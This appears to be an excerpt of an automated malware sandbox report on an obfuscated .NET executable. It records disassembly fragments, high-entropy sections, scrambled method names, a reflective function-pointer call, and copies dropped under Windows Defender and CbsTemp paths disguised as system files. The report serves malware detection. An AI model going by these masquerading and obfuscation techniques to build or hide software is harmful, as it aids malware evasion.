.Net Code: Type.GetTypeFromHandle(i4hmdfJd0lXqLo5RFWE.dKDqLRHgRTB(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(i4hmdfJd0lXqLo5RFWE.dKDqLRHgRTB(16777245)),Type.GetTypeFromHandle(i4hmdfJd0lXqLo5RFWE.dKDqLRHgRTB(16777259))})

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 0_2_00007FFD9B7D53D6 push cs; ret	0_2_00007FFD9B7D53D9
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 0_2_00007FFD9B7D00AD pushad ; iretd	0_2_00007FFD9B7D00C1
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 19_2_00007FFD9B7F53D6 push cs; ret	19_2_00007FFD9B7F53D9
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 19_2_00007FFD9B7F00AD pushad ; iretd	19_2_00007FFD9B7F00C1
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 20_2_00007FFD9B7E53D6 push cs; ret	20_2_00007FFD9B7E53D9
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 20_2_00007FFD9B7E00AD pushad ; iretd	20_2_00007FFD9B7E00C1
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7D53D6 push cs; ret	21_2_00007FFD9B7D53D9
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7D00AD pushad ; iretd	21_2_00007FFD9B7D00C1
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7E7E87 pushad ; retf	21_2_00007FFD9B7E7EBD
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B7E1DD4 push eax; iretd	21_2_00007FFD9B7E1DD5
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 21_2_00007FFD9B80C470 push A735F181h; iretd	21_2_00007FFD9B80C476
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B817E87 pushad ; retf	22_2_00007FFD9B817EBD
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B811DD4 push eax; iretd	22_2_00007FFD9B811DD5
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B8053D6 push cs; ret	22_2_00007FFD9B8053D9
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Code function: 22_2_00007FFD9B8000AD pushad ; iretd	22_2_00007FFD9B8000C1
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B7F7E87 pushad ; retf	23_2_00007FFD9B7F7EBD
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B7F1DD4 push eax; iretd	23_2_00007FFD9B7F1DD5
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B81C470 push A735F181h; iretd	23_2_00007FFD9B81C476
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B7E53D6 push cs; ret	23_2_00007FFD9B7E53D9
Source: C:\Windows\CbsTemp\System.exe	Code function: 23_2_00007FFD9B7E00AD pushad ; iretd	23_2_00007FFD9B7E00C1
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B8053D6 push cs; ret	24_2_00007FFD9B8053D9
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B8000AD pushad ; iretd	24_2_00007FFD9B8000C1
Source: C:\Windows\CbsTemp\System.exe	Code function: 24_2_00007FFD9B83C470 push A735F181h; iretd	24_2_00007FFD9B83C476
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B817E87 pushad ; retf	29_2_00007FFD9B817EBD
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B811DD4 push eax; iretd	29_2_00007FFD9B811DD5
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B8053D6 push cs; ret	29_2_00007FFD9B8053D9
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B8000AD pushad ; iretd	29_2_00007FFD9B8000C1
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Code function: 29_2_00007FFD9B83C470 push A735F181h; iretd	29_2_00007FFD9B83C476

Source: Etqq32Yuw4.exe	Static PE information: section name: .text entropy: 7.56712127893692
Source: gmRWetzDcocJEC.exe.0.dr	Static PE information: section name: .text entropy: 7.56712127893692
Source: gmRWetzDcocJEC.exe0.0.dr	Static PE information: section name: .text entropy: 7.56712127893692
Source: gmRWetzDcocJEC.exe1.0.dr	Static PE information: section name: .text entropy: 7.56712127893692
Source: System.exe.0.dr	Static PE information: section name: .text entropy: 7.56712127893692

Source: Etqq32Yuw4.exe, N9v4tN6F9Cj4VXU6gY8.cs	High entropy of concatenated method names: 'mAg6yXBHe8', 'XZM6p2JdXI', 'uZL62fbcvl', 'oS06AZLbhB', 'Dispose', 'EyocwK5fMMyfOPGZTYh8', 'DOqvZv5fiEOASL6Il9le', 'z6uGXb5fLpaPRtihjqQw', 'puccog5f8xYYNkor0mm8', 'C5Lux55fE7qFwHCU0qqH'
Source: Etqq32Yuw4.exe, rdrcquqsZcEI01b3sbH.cs	High entropy of concatenated method names: 'ccQS8yXTG2', 'KJSCXg5VefgDAI0CsPUl', 'uYwGC85VfRwIbZ6xmGy4', 'sTvt165VxyOTQWBC0cTU', 'zlBMcF5V6sXiTvl9HRCC', 'RMWFJg5VJAydBeWpo09s', 'wxpS9bcjBU', 'wR4SqJbFnL', 'yNFSSKUak2', 'UCTSimkQK4'
Source: Etqq32Yuw4.exe, FO001C6IJNXkF4CPMQp.cs	High entropy of concatenated method names: 'dEo6tNajWF', 'jXA6WFbM3c', 'lN66bYTdtx', 'N8u6DLGKDy', 'ByJ6kyK3B8', 'shw6UD1HgQ', 'YJX6CYIhua', 'p6N6YqIWUC', 'Dispose', 'QI4ePJ5ezdi5DHMqW5fs'
Source: Etqq32Yuw4.exe, mMsK4OEHbNOcHKCf7Dm.cs	High entropy of concatenated method names: 'DfIE4Oj9oF', 'DMtEITS2pJ', 'M1yEdB88c9', 'ViH9r25p4uKuOoXgvaBS', 'wXLuWG5pIadEseRNsaQe', 'djIY845pHTGRqhtj9miT', 'gTvIF15p1s7ZR6RU1fmk', 'yqelL85pdN35UBuqDi8f', 'Yjpqpd5pn5sNDmqEfqEW', 'sQBEut5ptYsheXMvZxpM'
Source: Etqq32Yuw4.exe, vCHIhoiCPrQ5hPBF24J.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'kXm5ESvIg8o', 'UKa5i5QUEqH', 'WOZY9q5T7f3QkhhU0PZO', 'DYly505TbnZUkI1cW2K2', 'rYmQrh5TDLUCnl6b96W6'
Source: Etqq32Yuw4.exe, JtXCiZBFIlrvWpLqdm4.cs	High entropy of concatenated method names: 'TqaByYAVUY', 'tjXBpxrKP2', 'NQ4B2oICx1', 'QXDBAlaskF', 'z2yBQ1N2tw', 'jseBBwpQ73', 'TPUBrXGArB', 'fOTBcIyGtL', 'lU2BGlZdQ7', 'DpgBOqRLO3'
Source: Etqq32Yuw4.exe, g3uf1TLg1nJQp4p1PvW.cs	High entropy of concatenated method names: 'GS9Lf1ONNK', 'pdHLJstBrB', 'ToOLmWCMEK', 'H4SLzi8M7n', 'owRM9E5Bry', 'jt3M537RXm', 'nO7MqBWYyT', 'hmHolG5Xdjw2Ef5nnCTo', 'vnqT9n5X4KpY9BcgnEwt', 'pCR3WT5XIXOkOWG9MefZ'
Source: Etqq32Yuw4.exe, opBDOLWBO60MObkVTWi.cs	High entropy of concatenated method names: 'sSBW07XpL6', 'ILJWNWlhyM', 'bIXWP4JAg6', 'oMFjr85cLvdtfaJaPrut', 'C24Hf35cMMWNugHmWC2D', 'VU05Wv5cSMrIHx7RLNiV', 'cWkM985ciQR5oZJdP6VF', 'CeCWchekSm', 'NVQWG2Y78k', 'xqSWOSsqFA'
Source: Etqq32Yuw4.exe, YDrrMYCkfuc3sTyaVro.cs	High entropy of concatenated method names: 'DgnCCLqeYv', 'ehdCYZihlP', 'kZpCajpIMS', 'cQZCVy2APH', 'TCLCvldHl5', 'IIVlEt5j0WxHl3GYoN5C', 'LZFuwY5jlGjU66vjMBGc', 'd0mvn15jjuIaXt7706J1', 'SwICRm5jN6v5BEAiKfeu', 'dVejOn5jPsMg8O0cIGhi'
Source: Etqq32Yuw4.exe, dpCPLyBKQ28qUcmDVVU.cs	High entropy of concatenated method names: 'dPSBUG5GZX', 'B7dfXs53z5rsjWveyIhh', 'GjLh2X53JIghDaxKCVeo', 'jKV7lf53mIhbWTHkOu2I', 'K5Hacg5o9HgDcSb2O9Js', 'uqWKsy5o5v6mPD6Dt2P2', 'IPy', 'method_0', 'method_1', 'method_2'
Source: Etqq32Yuw4.exe, ELajlQEbvG4MEB2Qv0a.cs	High entropy of concatenated method names: 'jfcEkgldDT', 'yYfFEH5pvCURIOylhHrn', 'Y1WLVq5pTkpNg9Xt942L', 'iVOFtp5pFOgaT8ZIjlSw', 'i09j6w5pX2WIMXf5MZyg', 'jg2Jmu5py1qF2rCfqQZM', 'yWmy3G5pamaRpP6bh4SA', 'JHCbgn5pVCGo16ftxFZq', 'SQvxUN5ppCLGaiax2tjG'
Source: Etqq32Yuw4.exe, OVgHpxWoRLrq1CHpwKU.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'pop5EIc63pQ', 'G7O5i0SpcVb', 'zPJwuq5cnruDEZ93ZxdA', 'T4k2k35ctqxbm4s7OH7Z', 'rRpWZc5ch2roKTiTr01F', 'amk6qV5cwbT4AdT4eoeV', 'J64QkY5cRSijFF2bc9fb'
Source: Etqq32Yuw4.exe, Qh1MnyZl0br1ltC79Bf.cs	High entropy of concatenated method names: 'sZgZ0jtXkL', 'aLZZNfpkPf', 'gr2ZPPJI3n', 'zGItvq5GhkoBSXEQO82E', 'ca31wN5Gn1ysOgEmaLxe', 'USm0qc5GtlbnesTAFvFL', 'tQIhar5Gw5kxkWDkHSwb', 'XeK3JH5GRQ1cHSK9PM4Z'
Source: Etqq32Yuw4.exe, JSbUaYnDhmxgFX4cIxX.cs	High entropy of concatenated method names: 'haTWI48ME2', 'dk3WdI13gM', 'lsSKXr5rAiU98wi8GS6q', 'BhIxce5rppeLnYOBS3KG', 'yUNvCc5r27djN6GMRJNR', 'K9fHeN5rQChp5tmT4qK9', 'ieZ3ht5rByM25D7VpEFd', 'lL6WWrkHea', 'Ly5hg05rcfc4Q9EaXvms', 's9R0KH5rG2HDdP6aoHLG'
Source: Etqq32Yuw4.exe, gS3Mmi8Ixcl0MjUUMNd.cs	High entropy of concatenated method names: 'P9X', 'TJK5iDOvvvF', 'vmethod_0', 'imethod_0', 'EuC9wp5yZPGEoKoWXxj3', 'aUUIkQ5y7GQrgBanmO4Y', 'cMCugc5yRl1u4jAwWIsG', 'HMVkZQ5yWKJiDFsBofk5', 'kDxWsL5yb13H07aKj2vQ', 'daynSE5yDxxqulgep6PO'
Source: Etqq32Yuw4.exe, CRHmN8TjRk4D7Hbg9cq.cs	High entropy of concatenated method names: 'H95TN0HIRo', 'HjNTPK4nDb', 'ymATuDqxDP', 'sNYTsutqGg', 'c3nTgaqmkT', 'e4qBiH5u2itGKyf6UsU1', 'ioyFqh5uA1Bc5pDx6ZL2', 'uoLQlo5uQXkvSZkiJ78N', 'XVCpxo5uyCOdW9gJ2cOt', 'uRckss5upuDypPdW4wAk'
Source: Etqq32Yuw4.exe, laUSADaGpkWuuGIqJ9L.cs	High entropy of concatenated method names: 'vUiaJEEql9', 'Ha4azTJGda', 'OvSalcisQF', 'DNsajgt7Pl', 'EBKa0eyhDw', 'HHnaN4uoFj', 'ShmaPwEStl', 'zvDau4g5hV', 'UM7askuAL6', 'HSOag3GQ2x'
Source: Etqq32Yuw4.exe, WO67mHLlVtTqUhfqO1a.cs	High entropy of concatenated method names: 'bJNLuWlwyY', 'cPTUuy5XqidwlnbOYgF6', 'wmBjLr5X9WvvFYMFEDX6', 'CXRcdY5X5ZmFXrJNfNa6', 'l2Q2435XSWg57sH8EdUX', 'S2AxyM5Xi6Hc0JAZfR8Z', 'U1J', 'P9X', 'glc5itGUvNy', 'jG85ihSaJeB'
Source: Etqq32Yuw4.exe, wx5epiqF7Rq4Ny4gZKA.cs	High entropy of concatenated method names: 'nlnqG1PGAW', 'JdyqO2ZbZt', 'jrCieD5V2tKJ44BF0lof', 'Tted9A5VyMLW0ysHd2sK', 'tARZOI5Vpr5HGcGrLOVQ', 'ln7qNmRKR6', 'oZUTRN5Vr309xq389NeE', 'G9YQRY5VcJC0faZFOUtu', 'Ym2bA35VQ8GNhpiAUhel', 'q0WAvG5VBUu6kGkueyIA'
Source: Etqq32Yuw4.exe, lc1nUVirH4PehGHlcaL.cs	High entropy of concatenated method names: 'BAxiJ4udCg', 'XN4Ae95F5PYNSlQBNDsj', 'mpJops5FqmL4T38S9Wu2', 'GHkyyH5TzTZQNfkZWyHK', 'mUoSpF5F9uFE26exwrp6', 'WKksRw5Fi4YWxLYukcKq', 'iVNxtl5FLvyQKw4CbgLd', 'WpnmpY5FMBgmmRsQEsRE', 'GFQLMfwXCZ', 'BP0SSv5FHEYtyaQou1G8'
Source: Etqq32Yuw4.exe, xgNhDZKkKeRYgty5yIv.cs	High entropy of concatenated method names: 'buaf845QTEsehlx6ttG6', 'KygxdJ5QVoHGhOQIYgI7', 'ayfCFO5Qv8mrMs3ln9Ry', 'IJW1Um5QF8rs2wwEslfp', 'Q5adm1FGaF', 'jIcVnj5QyvInvoZ9R7qF', 'v7L7OY5QpMwM62IT9E8G', 'MNtIkU5Q231dQgRTBp1i', 'kTnn5LkZ5v', 'YNlltE5QraYoy7vbU8ZQ'
Source: Etqq32Yuw4.exe, BaELGeqZ0KU3RuohIQU.cs	High entropy of concatenated method names: 'kjaqbIKB2o', 'pTyqDCctUs', 'UeG5om5VUWWtmXE2hw75', 'wOovrt5VDsk9oaiMptHD', 'SqoB1s5Vk5hWMbZG9xJA', 'djS6lY5VCbHycPp1DcaL', 'M3nGLG5VYvE8mJvBidIH', 'YsMw0U5VaRGcsq1VArJ2'
Source: Etqq32Yuw4.exe, CmZB15ysZHyuJhnFspN.cs	High entropy of concatenated method names: 'RFsy3pT3KY', 'k6r', 'ueK', 'QH3', 'VsRyoDy90I', 'Flush', 'Biiyx9UYqW', 'Qdny6tSQri', 'Write', 'DSqye6tW7O'
Source: Etqq32Yuw4.exe, u0JhNKE0gRUtuG0NBVY.cs	High entropy of concatenated method names: 'eGIE62THHV', 'TjFSrA5pzlNawCxJfp6p', 'nUHg5A5pJCmdC6UyB8H5', 'oXFHdV5pmwxRGrXBc3Or', 'pqRVhl529I1ZvahDjtqk', 'ifBWDr525j3CxorfcD2G', 'P9X', 'vmethod_0', 'x0S5iaeANSU', 'imethod_0'
Source: Etqq32Yuw4.exe, MY4q36c2LqltYMM44l7.cs	High entropy of concatenated method names: 'kM7JJN5x2DBwM1KJtjAx', 'b6c0sa5xyTR4H05wLj88', 'qxWIqv5xpnqb1AZ8xQFC', 'gNgXq15xvdmal12FqACa', 'EPD2Yb5xTOqriOPLCyhb', 'BkqhNI5xFeOXXn0vmCZr', 'b4vT6i5xalBAKGmd2NK7', 'EdtD9q5xVU6pA8apFjI7'
Source: Etqq32Yuw4.exe, N3udAW8F9hfY10YH7w4.cs	High entropy of concatenated method names: 'fHv8yAmHX6', 'YmN8pYM2r7', 'uyb6Ws5yrOoE9De0n3Bl', 'el8ejC5yctACP4nYboeF', 'R6wAKU5yGBDMsgyRIa5m', 's5DCBf5yOsAFFxpNLITp', 'xLW51f5ylvPOP1Gy4jVZ', 'ehvfAq5yj5Q3hxrDPbBv', 'Bpow8Y5y0SEef9wNpKY1'
Source: Etqq32Yuw4.exe, sbdbZv7t3GsixpSHd1E.cs	High entropy of concatenated method names: 'NW0Fid5O4o4op1jkgAV5', 'f3pFvZ5OIbfpg4BgdLuT', 'nihM8k5OdEtQF8qfUtpu', 'M9f87d5OHUZn9DK52qxc', 'g64iOZ5O15A6cW9Zb6WE', 'method_0', 'method_1', 'itg7wBHmtb', 'BbK7RvPXpP', 'JSY7WYYMWe'
Source: Etqq32Yuw4.exe, nSqcqs5mNJ5DkB8td6W.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'eX85E5jdSZN', 'UKa5i5QUEqH', 'jEfwVQ5azoI4nLSio6Xb', 'wj9ByP5V9v1TtpTkt3lr', 'X56i155V5hZoHWloYA0s', 'jsUewv5VqOdRDorGaoM4'
Source: Etqq32Yuw4.exe, eMaQbr71WTGGqR9e8tQ.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'oOQ5EbT5Fvh', 'iBy5EDcaMyV', 'qdDY1s5GPVXruYCaALPM', 'pyp9k15GuRRID4AIhZQl', 'AO3C0K5Gsnv9vrbyFnMi', 'n70bbS5GgJc6v3QgRdjr', 'jHPDky5G3M54IXs28Rwr', 'P7JadH5Gogcgcdav1Iw3'
Source: Etqq32Yuw4.exe, QRiB1Cy2F6TSGPph1Xx.cs	High entropy of concatenated method names: 'Close', 'qL6', 'pY4yQocqGY', 'a3fyB5uB17', 'GMAyrHpvq0', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: Etqq32Yuw4.exe, HPODrP8GI58pAER5TFe.cs	High entropy of concatenated method names: 'NEF86pTUOJ', 'MmY8eZGl3i', 'aC8hOU5ym02wQsp5rFr0', 'qwVUJS5yzNIX9EMQyxKp', 'noe8ldVojB', 'nbF8j3pqJO', 'OZn80lEFjZ', 'Bm08NSikaC', 'A488P6PRY8', 'V9x8uSgNwk'
Source: Etqq32Yuw4.exe, CYWuAHJr6rcJh8LHiSC.cs	High entropy of concatenated method names: 'BM55MXunjt9', 'YRw5MyRq1wE', 'Jqy5MplglFw', 'ORx5M2irey3', 'HBR5MAYpuOi', 'Ji95MQYwAQD', 'Rq15MBtBweP', 'yTCmLcWHE7', 'Ic65MruAiRd', 'Jb15McI6LHL'
Source: Etqq32Yuw4.exe, gvQUGnkHlQZyKiFqSei.cs	High entropy of concatenated method names: 'HGYkFIKVHO', 'uxuk4qCvNK', 'P7bkIP7JMM', 'eDJkdp7YIb', 'SJ2knF8mNb', 'T3dktV2Gmo', 'dDvkhedVO6', 'gL6kwF37RI', 'bqckRnNdjM', 'RjdkW04ClM'
Source: Etqq32Yuw4.exe, GmWdDZA2cMKVXgatCBn.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'ERHhY953h4PRYZ6wTIKd', 'TbY0Rm53wh4hadQKwpSj', 'ICsmGT53RXywhAlBUStJ'
Source: Etqq32Yuw4.exe, SLbR3ExXPd0d9y5C7Mq.cs	High entropy of concatenated method names: 'ok4xpC7RFm', 'eNKx2CIrH3', 'Vc8xAruXFM', 'pDHxQbuuBl', 'PcBxBCUM1k', 'gGdxrdwLRV', 'Xn5xctNNvj', 'UK8xGL6UM9', 'FYFxO2ENiA', 'Ke9xl2mdcU'
Source: Etqq32Yuw4.exe, LL1akEaST2Ur1Q1dIHi.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'jEHaLspHmJ', 'Write', 'UKIaMiNpPj', 'FlTa86TD0C', 'Flush', 'vl7'
Source: Etqq32Yuw4.exe, IVS398KdkIh6rDUWnWe.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'e8fVW752CZCXoVskGFmC', 'vXD71Y52YaB3WBwa03xF', 'kNXvvA52aGcXVVoaZK8g', 'ugko5452VtQxoNXH13WO'
Source: Etqq32Yuw4.exe, MNHNxLe9LGNt92luT13.cs	High entropy of concatenated method names: 'jU1eieokZ5', 'mZSeLEMuHX', 'eMqUWm5fTRDehKKukVdR', 'weN8wd5fVac2nOoALTwq', 'P0mo8b5fvJ5rE0RlUV38', 'pvyoUB5fFhpQYl4S6SWm', 'vVW9Jn5fXKcS7xm3J51q', 'gCCeqmdiB5', 'Y95QXg5fCVBgsA8qNsAG', 'nIOZtQ5fkhFt6tH8Cv5P'
Source: Etqq32Yuw4.exe, mXdmqtrFTF1ZN1chIBy.cs	High entropy of concatenated method names: 'Iacry7bpfK', 'Euwrpvq9U8', 'jkqr2Cj3N6', 'HinrAVO0MT', 'pO3rQ7O1bG', 'u6GrBluSOP', 'HsprrYbRnA', 'PTWrcvnOWs', 'ljvrGXx22y', 'RdvrOWaO92'
Source: Etqq32Yuw4.exe, gB515QbIvQ3qBUQN732.cs	High entropy of concatenated method names: 'NG1k54Ftd7', 'CHqRFv5l7WweNX9snsXm', 'iD15Nl5lWQiX611bCGCu', 'qErtlo5lZe1Yy2gNMH1c', 'pPVWJS5lblKXYPHRaXxK', 'xuVbnWn4U4', 'SlBbt477EK', 'Qeybhsyp1R', 'n6mbwk0kAM', 'VyBbRrY5dt'
Source: Etqq32Yuw4.exe, kOia8yZBYZELCY0FpbZ.cs	High entropy of concatenated method names: 'N2N', 'UGR5EnXBfMV', 'WKfZcUxBkQ', 'nqL5Etw1h2F', 'kYaT2K5GKmvfgRJr2SWU', 'OThP7v5GHAXXWwtdmGuT', 'jH087T5G8Qf1M9KcBE54', 'nTy11a5GEwT50laYwprQ', 'u0oIaw5G1AcQ3ZDRlglP', 'HeCvM65G4FYGmTLXIxa2'
Source: Etqq32Yuw4.exe, AJpLNJ5oSM2NPE4cd3d.cs	High entropy of concatenated method names: 'P9X', 'Yk856rPI9n', 'HuG5E96ShKx', 'imethod_0', 'nsi5eMRS5j', 'vPKEcN5a6f169KkchtWT', 'GImVFg5aeNsQOJgw3ZJK', 'zey4Yn5aovXWHFCpVK1o', 'ePAxoX5axjYWVrEFg0E6', 'oCbkLA5afClVmhHb4ZlH'
Source: Etqq32Yuw4.exe, FR8EFxBjRDFsKwVVNer.cs	High entropy of concatenated method names: 'AFJ5EUXSc8X', 'hn3BNFWCrD', 'Ta3BPYKZpv', 'l5YBuPV5ta', 'yX9g415o10NTD4Qacy9M', 'lq6LP75o4tjDsRJwxP7R', 'Tw7VL05oIvPFoh2DwkhP', 'L02YfJ5odLMS8vRuXjsR', 'rlGyxY5onkeTyGDOC7O8', 'TUtW0a5otU6NUZHXycJb'
Source: Etqq32Yuw4.exe, GW8CArV3S1XNmMjGlvd.cs	High entropy of concatenated method names: 'DfSVxwMX0B', 'oOcV6onRlH', 'UVEVegey9p', 'eo7VfatsXf', 'jsDVJq2Rin', 'Q2tprb5NcLbdGFC1xnpm', 'R3xeif5NBjLaNl3op0t4', 'zN54R45Nr6q83WhtuseH', 'upBSYp5NGI0nnn0Gihvi', 'dFOEId5NOnMwBt6YToMo'
Source: Etqq32Yuw4.exe, kbFGNEKqnNqstrulBuH.cs	High entropy of concatenated method names: 'GU0KiM3F7F', 't1mKLF8qvt', 'h2vKMZ6pbf', 'UIQK8B8trf', 'yMBKEkTLLk', 'tK6KKDuT0E', 'ojoKHaJl1D', 'LVHK1iCN8Q', 'voUK4wqIPb', 'VgxKIMr8oD'
Source: Etqq32Yuw4.exe, XKsPgRpsT0IcfsFoPJn.cs	High entropy of concatenated method names: 'XF80pK5goBqFLIhtUOFK', 'kNxk3s5gg6KuJYSlaBMM', 'z7G0SE5g38vjBNH8ZOYA', 'doWp3qHxgh', 'Mh9', 'method_0', 'RiKpoFxQcR', 'PiKpxCCjbc', 'xwPp6OvYnE', 'GrMpeHOeQt'
Source: Etqq32Yuw4.exe, jlRtvtZd4evDTDau2nK.cs	High entropy of concatenated method names: 'P4QZZhLOtl', 'yKXpCh5cNI2bOQE0j9bu', 'Ih4OKp5cPWMePn3X7eFR', 'fRo3oY5cjyKiBV0ZUqF6', 'POrnCJ5c0wTl0Q8W7oUd', 'qCmIVH5cuULgp34FVMt4', 'qUyZtywr4y', 'LXtmFQ5cr9LXqfflYQrH', 'tDa6Oj5cQRKBlYvKPyrc', 'YH1TTT5cBYS1ErNtOkVF'
Source: Etqq32Yuw4.exe, KN7Sfu85sAIcd7UtkR2.cs	High entropy of concatenated method names: 'FZR8SgrQen', 'VtI8i15x68', 'unO8L9hYqH', 'OG3Zeh5ySeGEmwvr5wLq', 'tpViwV5y5sLUWhlD1gxX', 'YF68vV5yq8TLGykeFebS', 'kLyuTm5yi8dW1AVSByqS', 'lqTlnm5yLKwRTKIxe33U', 'ne2UWf5yM0s4LgSgGA5k', 'HtAYxO5y8Equ1MN4GVUm'
Source: Etqq32Yuw4.exe, Cc2P0ewmFHQfxjsjUT.cs	High entropy of concatenated method names: 'LD9pK6RcM', 'KfWGD15YF6Gfnaf2gC9e', 'okt8ki5YvHgnXYeSAU16', 'kxVMrg5YTwcBMucggUcU', 'dkvWLrUGd', 'vZMZpnn2Q', 'NJI7EKSMd', 'ljBbeM8If', 'Jm1DWXRxX', 'NeCkBt0Mp'
Source: Etqq32Yuw4.exe, KHArEBZuScQ7byCnjpS.cs	High entropy of concatenated method names: 'w6p5EhlVvMl', 'C6sZgATjBl', 'd0P5Ewvtcwo', 'tAHRn65GbwifK80X2Hrq', 'lA7cBy5GZBpBjlnQRdpC', 'JS9LkF5G7QDZ7goZLh1V', 'TQQ1R25GD3Z3Q6AijimK', 'TL5hOr5GkesE2ave2iu5'
Source: Etqq32Yuw4.exe, GNxCrhTmSmtZFBkiMUH.cs	High entropy of concatenated method names: 'TcOF9yRBgU', 'eAaF5TdBLT', 'Yd7', 'IvhFq4cSLU', 'S3sFSNBVWy', 'mayFiyuIdE', 'NqvFLXPvaF', 'Jicgog5uP7Ly2NgOkoUi', 'gfnM3H5u03oQoSdWl43g', 'lj1Tlv5uN7q5R3ck7Uht'
Source: Etqq32Yuw4.exe, uW372BSs6yaaLEFZmfd.cs	High entropy of concatenated method names: 'pK2iSEeWQV', 'TUEiiA4H4J', 'KjIiLko7Sq', 'StFRSA5vzrqU1lkjpKig', 'hrUF8a5T9ABs0KNGLvYq', 'L82LEi5vJAZSk3O2ehjm', 'HjFhyE5vmRXCfKhyRHOW', 'jUAi1AUgTW', 'h4heHd5Tq13WgW53Kljj', 'E6Kpqn5TSirqUlbawIVG'
Source: Etqq32Yuw4.exe, hckiWnpQFoHScS1K0s4.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'Pkcpr5GHC0', 'JohpcwJ3xI', 'Em8pG8dM2k', 'VBYpOk6O1o', 'LsCplKu9h2', 'wAEpjYb2WK', 'FjyE9V5gXKAovOXyxgws'
Source: Etqq32Yuw4.exe, gPrmPUY1XVtrO99f2Vb.cs	High entropy of concatenated method names: 'dKGYIxeIAE', 'khKYd1YlMi', 'syqYnWUjlF', 'M7HYtZs2jQ', 'bGeYhoPyWl', 'Lq4rbX50iW9lshhXPuHm', 'oRvNXC50qjTGasIQZFww', 'PIkCdf50S5Eb3Fe6C46A', 'tAi1cP50LcNqSkkMeNZh', 'DlaQU350M6hYoYaYFAVF'
Source: Etqq32Yuw4.exe, MBOBwAz2MR5S6MPqIh.cs	High entropy of concatenated method names: 'rex55wQ6N8', 'tVl5S7fYgr', 'Fea5icTchh', 'zY35L6XGKb', 'HC55M3lMW6', 'NRW58gQ3Qw', 'BNQ5KCjWcj', 'k37jPg5aM8ljlxqE3F3J', 'tIny0H5a8OcGyo6PdON1', 'zsvOI75aEloXrtSvN6dU'
Source: Etqq32Yuw4.exe, FLxMgXUlkrsgVhDQA05.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'amgU0GGbFn', 'CbnUNvo6CM', 'Dispose', 'D31', 'wNK'
Source: Etqq32Yuw4.exe, konuLwVmeisllET2bHl.cs	High entropy of concatenated method names: 'LZPv95ROK7', 'a4Rv5VIwah', 'IR2vqV1ABS', 'zIhvS52kHy', 'yH8viQB3iJ', 'BgjvL2DKba', 'TFlU9B5Nu4ZyBa97TS5T', 'xAHtAm5NNHgqWhK7t1Yf', 'SEKBAt5NPba7yvP7AcLr', 'luhL1a5NsmnyK9OM710n'
Source: Etqq32Yuw4.exe, JLgp1qMULU7lxlBPVLa.cs	High entropy of concatenated method names: 'wCGMFdkLnM', 'PDwYIw5XrBTQYsEPNxho', 'R5EPm05XQE6YmKNx3Naw', 'f8CcnA5XBqYtdUEyeMW5', 'jemSd05XcQ1VLQhMQ3G4', 'FNQvDF5XGoQE67y4YFlW', 'E94', 'P9X', 'vmethod_0', 'aAq5iZNOgsP'
Source: Etqq32Yuw4.exe, wpq2HGvFK8mtjhil0kr.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: Etqq32Yuw4.exe, N00myYYFDPf7CSoODyw.cs	High entropy of concatenated method names: 'method_0', 'N8TYy127DU', 'N4MYpVruEC', 'BcUY2s1Wuk', 'cvBYAo3gkd', 'R7YYQdFfvJ', 'oQFYBmimWy', 'QaXWFC50n3IhXOFQGIDf', 'LnpAJ450IB9UZ88C9Gek', 'QHRYTu50dZZrwrF2cQWH'
